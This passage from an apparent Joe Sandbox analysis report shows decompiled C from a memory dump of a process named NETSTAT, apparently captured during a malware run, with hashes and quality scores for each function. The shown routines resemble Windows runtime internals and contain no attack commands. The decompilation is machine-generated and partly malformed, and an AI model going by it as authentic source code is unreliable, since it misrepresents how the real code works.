                										L52:
                										_t193 = 0xc0000017;
                										L19:
                										 *(_t237 - 0x44) = _t193;
                										L20:
                										_t206 =  *(_t237 - 0x40);
                										__eflags = _t206;
                										if(_t206 == 0) {
                											L26:
                											__eflags = _t193;
                											if(_t193 < 0) {
                												E033937F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                												__eflags =  *((char*)(_t237 - 0x39));
                												if( *((char*)(_t237 - 0x39)) != 0) {
                													 *0x3447b10 =  *0x3447b10 - 8;
                												}
                											} else {
                												_t169 =  *(_t237 - 0x68);
                												__eflags = _t169;
                												if(_t169 != 0) {
                													 *0x3447b04 =  *0x3447b04 - _t169;
                												}
                											}
                											__eflags = _t193;
                											if(_t193 >= 0) {
                												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                											}
                											goto L30;
                										}
                										_t226 = _t206 * 0xc;
                										__eflags = _t226;
                										_t194 =  *(_t237 - 0x48);
                										do {
                											 *(_t237 - 0x40) = _t206 - 1;
                											_t226 = _t226 - 0xc;
                											 *(_t237 - 0x4c) = _t226;
                											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                													__eflags =  *((char*)(_t237 - 0x39));
                													if( *((char*)(_t237 - 0x39)) == 0) {
                														_t171 = _t210;
                													} else {
                														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                														L033777F0(_t194, _t236, _t210 - 8);
                														_t171 =  *(_t237 - 0x50);
                													}
                													L48:
                													L033777F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                													L46:
                													_t206 =  *(_t237 - 0x40);
                													_t226 =  *(_t237 - 0x4c);
                													goto L24;
                												}
                												 *0x3447b08 =  *0x3447b08 + 1;
                												goto L24;
                											}
                											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                											__eflags = _t171;
                											if(_t171 != 0) {
                												__eflags =  *((char*)(_t237 - 0x39));
                												if( *((char*)(_t237 - 0x39)) == 0) {
                													goto L48;
                												}
                												E033957C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                												goto L46;
                											}
                											L24:
                											__eflags = _t206;
                										} while (_t206 != 0);
                										_t193 =  *(_t237 - 0x44);
                										goto L26;
                									}
                									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                									 *(_t237 - 0x7c) = _t232;
                									 *(_t232 - 4) = _t214;
                									 *(_t237 - 4) = _t236;
                									E0339F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                									_t238 = _t238 + 0xc;
                									 *(_t237 - 4) = 0xfffffffe;
                									_t215 =  *(_t237 - 0x48);
                									__eflags = _t193;
                									if(_t193 < 0) {
                										L033777F0(_t215, _t236,  *(_t237 - 0x78));
                										goto L20;
                									}
                									__eflags =  *((char*)(_t237 - 0x39));
                									if( *((char*)(_t237 - 0x39)) != 0) {
                										_t233 = E0338A44B( *(_t237 - 0x4c));
                										 *(_t237 - 0x50) = _t233;
                										__eflags = _t233;
                										if(_t233 == 0) {
                											L033777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                											goto L52;
                										}
                										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                										L17:
                										_t234 =  *(_t237 - 0x40);
                										_t218 = _t234 * 0xc;
                										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                										 *(_t218 + _t235 + 0x10) = _t236;
                										_t224 = _t234 + 1;
                										 *(_t237 - 0x40) = _t224;
                										 *(_t237 - 0x50) = _t224;
                										_t193 =  *(_t237 - 0x44);
                										continue;
                									}
                									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                									goto L17;
                								}
                								 *_t235 = _t236;
                								_t165 = 0x10 + _t163 * 0xc;
                								__eflags = _t165;
                								_push(_t165);
                								_push(_t235);
                								_push(0x23);
                								_push(0xffffffff);
                								_t193 = E033996C0();
                								goto L19;
                							} else {
                								goto L50;
                							}
                						}
                						_t235 = _t237 - 0x38;
                						 *(_t237 - 0x60) = _t235;
                						goto L8;
                					}
                					goto L4;
                				}
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 278ca999cbbe79888a8d624884e7b4d4785f9c9d674aa7881202b34cb7eee28f
                • Instruction ID: 5a342dae30c77c74b0cffae0be13a279aebdc1200633ce0e78faedbee4770aba
                • Opcode Fuzzy Hash: 278ca999cbbe79888a8d624884e7b4d4785f9c9d674aa7881202b34cb7eee28f
                • Instruction Fuzzy Hash: 28B15CB4E00349DFDB15DFA8C9C4AADBBB9FF48304F14812AE615AF649D770A942CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E0338513A(intOrPtr __ecx, void* __edx) {
                				signed int _v8;
                				signed char _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				char _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				char _v63;
                				char _v64;
                				signed int _v72;
                				signed int _v76;
                				signed int _v80;
                				signed int _v84;
                				signed int _v88;
                				signed char* _v92;
                				signed int _v100;
                				signed int _v104;
                				char _v105;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t157;
                				signed int _t159;
                				signed int _t160;
                				unsigned int* _t161;
                				intOrPtr _t165;
                				signed int _t172;
                				signed char* _t181;
                				intOrPtr _t189;
                				intOrPtr* _t200;
                				signed int _t202;
                				signed int _t203;
                				char _t204;
                				signed int _t207;
                				signed int _t208;
                				void* _t209;
                				intOrPtr _t210;
                				signed int _t212;
                				signed int _t214;
                				signed int _t221;
                				signed int _t222;
                				signed int _t226;
                				intOrPtr* _t232;
                				signed int _t233;
                				signed int _t234;
                				intOrPtr _t237;
                				intOrPtr _t238;
                				intOrPtr _t240;
                				void* _t245;
                				signed int _t246;
                				signed int _t247;
                				void* _t248;
                				void* _t251;
                				void* _t252;
                				signed int _t253;
                				signed int _t255;
                				signed int _t256;
                
                				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                				_v8 =  *0x344d360 ^ _t255;
                				_v32 = _v32 & 0x00000000;
                				_t251 = __edx;
                				_t237 = __ecx;
                				_t212 = 6;
                				_t245 =  &_v84;
                				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                				_v48 = __ecx;
                				_v36 = _t207;
                				_t157 = memset(_t245, 0, _t212 << 2);
                				_t256 = _t255 + 0xc;
                				_t246 = _t245 + _t212;
                				if(_t207 == 2) {
                					_t247 =  *(_t237 + 0x60);
                					_t208 =  *(_t237 + 0x64);
                					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                					_v104 = _t159;
                					_v76 = _t159;
                					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                					_v100 = _t160;
                					_v72 = _t160;
                					L19:
                					_v80 = _t208;
                					_v84 = _t247;
                					L8:
                					_t214 = 0;
                					if( *(_t237 + 0x74) > 0) {
                						_t82 = _t237 + 0x84; // 0x124
                						_t161 = _t82;
                						_v92 = _t161;
                						while( *_t161 >> 0x1f != 0) {
                							_t200 = _v92;
                							if( *_t200 == 0x80000000) {
                								break;
                							}
                							_t214 = _t214 + 1;
                							_t161 = _t200 + 0x10;
                							_v92 = _t161;
                							if(_t214 <  *(_t237 + 0x74)) {
                								continue;
                							}
                							goto L9;
                						}
                						_v88 = _t214 << 4;
                						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                						_t165 = 0;
                						asm("adc eax, [ecx+edx+0x7c]");
                						_v24 = _t165;
                						_v28 = _v40;
                						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                						_t221 = _v40;
                						_v16 =  *_v92;
                						_v32 =  &_v28;
                						if( *(_t237 + 0x4e) >> 0xf == 0) {
                							goto L9;
                						}
                						_t240 = _v48;
                						if( *_v92 != 0x80000000) {
                							goto L9;
                						}
                						 *((intOrPtr*)(_t221 + 8)) = 0;
                						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                						_t226 = 0;
                						_t181 = _t251 + 0x66;
                						_v88 = 0;
                						_v92 = _t181;
                						do {
                							if( *((char*)(_t181 - 2)) == 0) {
                								goto L31;
                							}
                							_t226 = _v88;
                							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                								_t181 = E0339D0F0(1, _t226 + 0x20, 0);
                								_t226 = _v40;
                								 *(_t226 + 8) = _t181;
                								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                								L34:
                								if(_v44 == 0) {
                									goto L9;
                								}
                								_t210 = _v44;
                								_t127 = _t210 + 0x1c; // 0x1c
                								_t249 = _t127;
                								E03372280(_t181, _t127);
                								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                								}
                								_t189 = L03374620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                								if(_t189 != 0) {
                									 *((intOrPtr*)(_t189 + 8)) = _v20;
                									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                									 *_t232 = _t232 + 0x10;
                									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                									E0339F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                									_t256 = _t256 + 0xc;
                								}
                								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                								E0336FFB0(_t210, _t249, _t249);
                								_t222 = _v76;
                								_t172 = _v80;
                								_t208 = _v84;
                								_t247 = _v88;
                								L10:
                								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                								_v44 = _t238;
                								if(_t238 != 0) {
                									 *0x344b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                									_v44();
                								}
                								_pop(_t248);
                								_pop(_t252);
                								_pop(_t209);
                								return E0339B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                							}
                							_t181 = _v92;
                							L31:
                							_t226 = _t226 + 1;
                							_t181 =  &(_t181[0x18]);
                							_v88 = _t226;
                							_v92 = _t181;
                						} while (_t226 < 4);
                						goto L34;
                					}
                					L9:
                					_t172 = _v104;
                					_t222 = _v100;
                					goto L10;
                				}
                				_t247 = _t246 | 0xffffffff;
                				_t208 = _t247;
                				_v84 = _t247;
                				_v80 = _t208;
                				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                					_t233 = _v72;
                					_v105 = _v64;
                					_t202 = _v76;
                				} else {
                					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                					_v105 = 1;
                					if(_v63 <= _t204) {
                						_v63 = _t204;
                					}
                					_t202 = _v76 |  *(_t251 + 0x40);
                					_t233 = _v72 |  *(_t251 + 0x44);
                					_t247 =  *(_t251 + 0x38);
                					_t208 =  *(_t251 + 0x3c);
                					_v76 = _t202;
                					_v72 = _t233;
                					_v84 = _t247;
                					_v80 = _t208;
                				}
                				_v104 = _t202;
                				_v100 = _t233;
                				if( *((char*)(_t251 + 0xc4)) != 0) {
                					_t237 = _v48;
                					_v105 = 1;
                					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                						_t237 = _v48;
                					}
                					_t203 = _t202 |  *(_t251 + 0xb8);
                					_t234 = _t233 |  *(_t251 + 0xbc);
                					_t247 = _t247 &  *(_t251 + 0xb0);
                					_t208 = _t208 &  *(_t251 + 0xb4);
                					_v104 = _t203;
                					_v76 = _t203;
                					_v100 = _t234;
                					_v72 = _t234;
                					_v84 = _t247;
                					_v80 = _t208;
                				}
                				if(_v105 == 0) {
                					_v36 = _v36 & 0x00000000;
                					_t208 = 0;
                					_t247 = 0;
                					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                					goto L19;
                				} else {
                					_v36 = 1;
                					goto L8;
                				}
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0d6fa4f64d1d00c37cfa609d75d3d5f07b9cea605db5f92f873e89b1b6fbad00
                • Instruction ID: 70bd993183e0165ff7bf9b45654ef80e89b1be49b986a371e5170d8d9d8e2a39
                • Opcode Fuzzy Hash: 0d6fa4f64d1d00c37cfa609d75d3d5f07b9cea605db5f92f873e89b1b6fbad00
                • Instruction Fuzzy Hash: ACC133755083808FD354CF28C980A6AFBF1BF89304F184A6EF8998B362D775E845CB42
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E033803E2(signed int __ecx, signed int __edx) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				intOrPtr _v40;
                				signed int _v44;
                				signed int _v48;
                				char _v52;
                				char _v56;
                				char _v64;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t56;
                				signed int _t58;
                				char* _t64;
                				intOrPtr _t65;
                				signed int _t74;
                				signed int _t79;
                				char* _t83;
                				intOrPtr _t84;
                				signed int _t93;
                				signed int _t94;
                				signed char* _t95;
                				signed int _t99;
                				signed int _t100;
                				signed char* _t101;
                				signed int _t105;
                				signed int _t119;
                				signed int _t120;
                				void* _t122;
                				signed int _t123;
                				signed int _t127;
                
                				_v8 =  *0x344d360 ^ _t127;
                				_t119 = __ecx;
                				_t105 = __edx;
                				_t118 = 0;
                				_v20 = __edx;
                				_t120 =  *(__ecx + 0x20);
                				if(E03380548(__ecx, 0) != 0) {
                					_t56 = 0xc000022d;
                					L23:
                					return E0339B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                				} else {
                					_v12 = _v12 | 0xffffffff;
                					_t58 = _t120 + 0x24;
                					_t109 =  *(_t120 + 0x18);
                					_t118 = _t58;
                					_v16 = _t58;
                					E0336B02A( *(_t120 + 0x18), _t118, 0x14a5);
                					_v52 = 0x18;
                					_v48 = 0;
                					0x840 = 0x40;
                					if( *0x3447c1c != 0) {
                					}
                					_v40 = 0x840;
                					_v44 = _t105;
                					_v36 = 0;
                					_v32 = 0;
                					if(E03377D50() != 0) {
                						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                					} else {
                						_t64 = 0x7ffe0384;
                					}
                					if( *_t64 != 0) {
                						_t65 =  *[fs:0x30];
                						__eflags =  *(_t65 + 0x240) & 0x00000004;
                						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                							_t100 = E03377D50();
                							__eflags = _t100;
                							if(_t100 == 0) {
                								_t101 = 0x7ffe0385;
                							} else {
                								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                							}
                							__eflags =  *_t101 & 0x00000020;
                							if(( *_t101 & 0x00000020) != 0) {
                								_t118 = _t118 | 0xffffffff;
                								_t109 = 0x1485;
                								E033D7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                							}
                						}
                					}
                					_t105 = 0;
                					while(1) {
                						_push(0x60);
                						_push(5);
                						_push( &_v64);
                						_push( &_v52);
                						_push(0x100021);
                						_push( &_v12);
                						_t122 = E03399830();
                						if(_t122 >= 0) {
                							break;
                						}
                						__eflags = _t122 - 0xc0000034;
                						if(_t122 == 0xc0000034) {
                							L38:
                							_t120 = 0xc0000135;
                							break;
                						}
                						__eflags = _t122 - 0xc000003a;
                						if(_t122 == 0xc000003a) {
                							goto L38;
                						}
                						__eflags = _t122 - 0xc0000022;
                						if(_t122 != 0xc0000022) {
                							break;
                						}
                						__eflags = _t105;
                						if(__eflags != 0) {
                							break;
                						}
                						_t109 = _t119;
                						_t99 = E033D69A6(_t119, __eflags);
                						__eflags = _t99;
                						if(_t99 == 0) {
                							break;
                						}
                						_t105 = _t105 + 1;
                					}
                					if( !_t120 >= 0) {
                						L22:
                						_t56 = _t120;
                						goto L23;
                					}
                					if( *0x3447c04 != 0) {
                						_t118 = _v12;
                						_t120 = E033DA7AC(_t119, _t118, _t109);
                						__eflags = _t120;
                						if(_t120 >= 0) {
                							goto L10;
                						}
                						__eflags =  *0x3447bd8;
                						if( *0x3447bd8 != 0) {
                							L20:
                							if(_v12 != 0xffffffff) {
                								_push(_v12);
                								E033995D0();
                							}
                							goto L22;
                						}
                					}
                					L10:
                					_push(_v12);
                					_t105 = _t119 + 0xc;
                					_push(0x1000000);
                					_push(0x10);
                					_push(0);
                					_push(0);
                					_push(0xf);
                					_push(_t105);
                					_t120 = E033999A0();
                					if(_t120 < 0) {
                						__eflags = _t120 - 0xc000047e;
                						if(_t120 == 0xc000047e) {
                							L51:
                							_t74 = E033D3540(_t120);
                							_t119 = _v16;
                							_t120 = _t74;
                							L52:
                							_t118 = 0x1485;
                							E0335B1E1(_t120, 0x1485, 0, _t119);
                							goto L20;
                						}
                						__eflags = _t120 - 0xc000047f;
                						if(_t120 == 0xc000047f) {
                							goto L51;
                						}
                						__eflags = _t120 - 0xc0000462;
                						if(_t120 == 0xc0000462) {
                							goto L51;
                						}
                						_t119 = _v16;
                						__eflags = _t120 - 0xc0000017;
                						if(_t120 != 0xc0000017) {
                							__eflags = _t120 - 0xc000009a;
                							if(_t120 != 0xc000009a) {
                								__eflags = _t120 - 0xc000012d;
                								if(_t120 != 0xc000012d) {
                									_v28 = _t119;
                									_push( &_v56);
                									_push(1);
                									_v24 = _t120;
                									_push( &_v28);
                									_push(1);
                									_push(2);
                									_push(0xc000007b);
                									_t79 = E0339AAF0();
                									__eflags = _t79;
                									if(_t79 >= 0) {
                										__eflags =  *0x3448474 - 3;
                										if( *0x3448474 != 3) {
                											 *0x34479dc =  *0x34479dc + 1;
                										}
                									}
                								}
                							}
                						}
                						goto L52;
                					}
                					if(E03377D50() != 0) {
                						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                					} else {
                						_t83 = 0x7ffe0384;
                					}
                					if( *_t83 != 0) {
                						_t84 =  *[fs:0x30];
                						__eflags =  *(_t84 + 0x240) & 0x00000004;
                						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                							_t94 = E03377D50();
                							__eflags = _t94;
                							if(_t94 == 0) {
                								_t95 = 0x7ffe0385;
                							} else {
                								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                							}
                							__eflags =  *_t95 & 0x00000020;
                							if(( *_t95 & 0x00000020) != 0) {
                								E033D7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                							}
                						}
                					}
                					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                						if( *0x3448708 != 0) {
                							_t118 =  *0x7ffe0330;
                							_t123 =  *0x3447b00; // 0x0
                							asm("ror esi, cl");
                							 *0x344b1e0(_v12, _v20, 0x20);
                							_t93 =  *(_t123 ^  *0x7ffe0330)();
                							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                							asm("sbb esi, esi");
                							_t120 =  ~_t50 & _t93;
                						} else {
                							_t120 = 0;
                						}
                					}
                					if( !_t120 >= 0) {
                						L19:
                						_push( *_t105);
                						E033995D0();
                						 *_t105 =  *_t105 & 0x00000000;
                						goto L20;
                					}
                					_t120 = E03367F65(_t119);
                					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                						__eflags = _t120;
                						if(_t120 < 0) {
                							goto L19;
                						}
                						 *(_t119 + 0x64) = _v12;
                						goto L22;
                					}
                					goto L19;
                				}
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fec83fb0c4cd544d346b28ceaffb39883141968e1c4f6771ef17882145d6eefd
                • Instruction ID: 62c762db9f24d68d4c0acc6602a05319c1f3334fd57c355e7f9a6ce9770137e2
                • Opcode Fuzzy Hash: fec83fb0c4cd544d346b28ceaffb39883141968e1c4f6771ef17882145d6eefd
                • Instruction Fuzzy Hash: 5A915D31E04354AFEF36EB69CCD8B6DBBA8AB01714F090265E910AB2D1D7749C44C791
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E0335C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                				signed int _v8;
                				char _v1036;
                				signed int _v1040;
                				char _v1048;
                				signed int _v1052;
                				signed char _v1056;
                				void* _v1058;
                				char _v1060;
                				signed int _v1064;
                				void* _v1068;
                				intOrPtr _v1072;
                				void* _v1084;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				intOrPtr _t70;
                				intOrPtr _t72;
                				signed int _t74;
                				intOrPtr _t77;
                				signed int _t78;
                				signed int _t81;
                				void* _t101;
                				signed int _t102;
                				signed int _t107;
                				signed int _t109;
                				signed int _t110;
                				signed char _t111;
                				signed int _t112;
                				signed int _t113;
                				signed int _t114;
                				intOrPtr _t116;
                				void* _t117;
                				char _t118;
                				void* _t120;
                				char _t121;
                				signed int _t122;
                				signed int _t123;
                				signed int _t125;
                
                				_t125 = (_t123 & 0xfffffff8) - 0x424;
                				_v8 =  *0x344d360 ^ _t125;
                				_t116 = _a4;
                				_v1056 = _a16;
                				_v1040 = _a24;
                				if(E03366D30( &_v1048, _a8) < 0) {
                					L4:
                					_pop(_t117);
                					_pop(_t120);
                					_pop(_t101);
                					return E0339B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                				}
                				_t70 = _a20;
                				if(_t70 >= 0x3f4) {
                					_t121 = _t70 + 0xc;
                					L19:
                					_t107 =  *( *[fs:0x30] + 0x18);
                					__eflags = _t107;
                					if(_t107 == 0) {
                						L60:
                						_t68 = 0xc0000017;
                						goto L4;
                					}
                					_t72 =  *0x3447b9c; // 0x0
                					_t74 = L03374620(_t107, _t107, _t72 + 0x180000, _t121);
                					_v1064 = _t74;
                					__eflags = _t74;
                					if(_t74 == 0) {
                						goto L60;
                					}
                					_t102 = _t74;
                					_push( &_v1060);
                					_push(_t121);
                					_push(_t74);
                					_push(2);
                					_push( &_v1048);
                					_push(_t116);
                					_t122 = E03399650();
                					__eflags = _t122;
                					if(_t122 >= 0) {
                						L7:
                						_t114 = _a12;
                						__eflags = _t114;
                						if(_t114 != 0) {
                							_t77 = _a20;
                							L26:
                							_t109 =  *(_t102 + 4);
                							__eflags = _t109 - 3;
                							if(_t109 == 3) {
                								L55:
                								__eflags = _t114 - _t109;
                								if(_t114 != _t109) {
                									L59:
                									_t122 = 0xc0000024;
                									L15:
                									_t78 = _v1052;
                									__eflags = _t78;
                									if(_t78 != 0) {
                										L033777F0( *( *[fs:0x30] + 0x18), 0, _t78);
                									}
                									_t68 = _t122;
                									goto L4;
                								}
                								_t110 = _v1056;
                								_t118 =  *((intOrPtr*)(_t102 + 8));
                								_v1060 = _t118;
                								__eflags = _t110;
                								if(_t110 == 0) {
                									L10:
                									_t122 = 0x80000005;
                									L11:
                									_t81 = _v1040;
                									__eflags = _t81;
                									if(_t81 == 0) {
                										goto L15;
                									}
                									__eflags = _t122;
                									if(_t122 >= 0) {
                										L14:
                										 *_t81 = _t118;
                										goto L15;
                									}
                									__eflags = _t122 - 0x80000005;
                									if(_t122 != 0x80000005) {
                										goto L15;
                									}
                									goto L14;
                								}
                								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                									goto L10;
                								}
                								_push( *((intOrPtr*)(_t102 + 8)));
                								_t59 = _t102 + 0xc; // 0xc
                								_push(_t110);
                								L54:
                								E0339F3E0();
                								_t125 = _t125 + 0xc;
                								goto L11;
                							}
                							__eflags = _t109 - 7;
                							if(_t109 == 7) {
                								goto L55;
                							}
                							_t118 = 4;
                							__eflags = _t109 - _t118;
                							if(_t109 != _t118) {
                								__eflags = _t109 - 0xb;
                								if(_t109 != 0xb) {
                									__eflags = _t109 - 1;
                									if(_t109 == 1) {
                										__eflags = _t114 - _t118;
                										if(_t114 != _t118) {
                											_t118 =  *((intOrPtr*)(_t102 + 8));
                											_v1060 = _t118;
                											__eflags = _t118 - _t77;
                											if(_t118 > _t77) {
                												goto L10;
                											}
                											_push(_t118);
                											_t56 = _t102 + 0xc; // 0xc
                											_push(_v1056);
                											goto L54;
                										}
                										__eflags = _t77 - _t118;
                										if(_t77 != _t118) {
                											L34:
                											_t122 = 0xc0000004;
                											goto L15;
                										}
                										_t111 = _v1056;
                										__eflags = _t111 & 0x00000003;
                										if((_t111 & 0x00000003) == 0) {
                											_v1060 = _t118;
                											__eflags = _t111;
                											if(__eflags == 0) {
                												goto L10;
                											}
                											_t42 = _t102 + 0xc; // 0xc
                											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                											_v1048 =  *((intOrPtr*)(_t102 + 8));
                											_push(_t111);
                											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                											_push(0);
                											_push( &_v1048);
                											_t122 = E033913C0(_t102, _t118, _t122, __eflags);
                											L44:
                											_t118 = _v1072;
                											goto L11;
                										}
                										_t122 = 0x80000002;
                										goto L15;
                									}
                									_t122 = 0xc0000024;
                									goto L44;
                								}
                								__eflags = _t114 - _t109;
                								if(_t114 != _t109) {
                									goto L59;
                								}
                								_t118 = 8;
                								__eflags = _t77 - _t118;
                								if(_t77 != _t118) {
                									goto L34;
                								}
                								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                									goto L34;
                								}
                								_t112 = _v1056;
                								_v1060 = _t118;
                								__eflags = _t112;
                								if(_t112 == 0) {
                									goto L10;
                								}
                								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                								goto L11;
                							}
                							__eflags = _t114 - _t118;
                							if(_t114 != _t118) {
                								goto L59;
                							}
                							__eflags = _t77 - _t118;
                							if(_t77 != _t118) {
                								goto L34;
                							}
                							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                								goto L34;
                							}
                							_t113 = _v1056;
                							_v1060 = _t118;
                							__eflags = _t113;
                							if(_t113 == 0) {
                								goto L10;
                							}
                							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                							goto L11;
                						}
                						_t118 =  *((intOrPtr*)(_t102 + 8));
                						__eflags = _t118 - _a20;
                						if(_t118 <= _a20) {
                							_t114 =  *(_t102 + 4);
                							_t77 = _t118;
                							goto L26;
                						}
                						_v1060 = _t118;
                						goto L10;
                					}
                					__eflags = _t122 - 0x80000005;
                					if(_t122 != 0x80000005) {
                						goto L15;
                					}
                					L033777F0( *( *[fs:0x30] + 0x18), 0, _t102);
                					L18:
                					_t121 = _v1060;
                					goto L19;
                				}
                				_push( &_v1060);
                				_push(0x400);
                				_t102 =  &_v1036;
                				_push(_t102);
                				_push(2);
                				_push( &_v1048);
                				_push(_t116);
                				_t122 = E03399650();
                				if(_t122 >= 0) {
                					__eflags = 0;
                					_v1052 = 0;
                					goto L7;
                				}
                				if(_t122 == 0x80000005) {
                					goto L18;
                				}
                				goto L4;
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
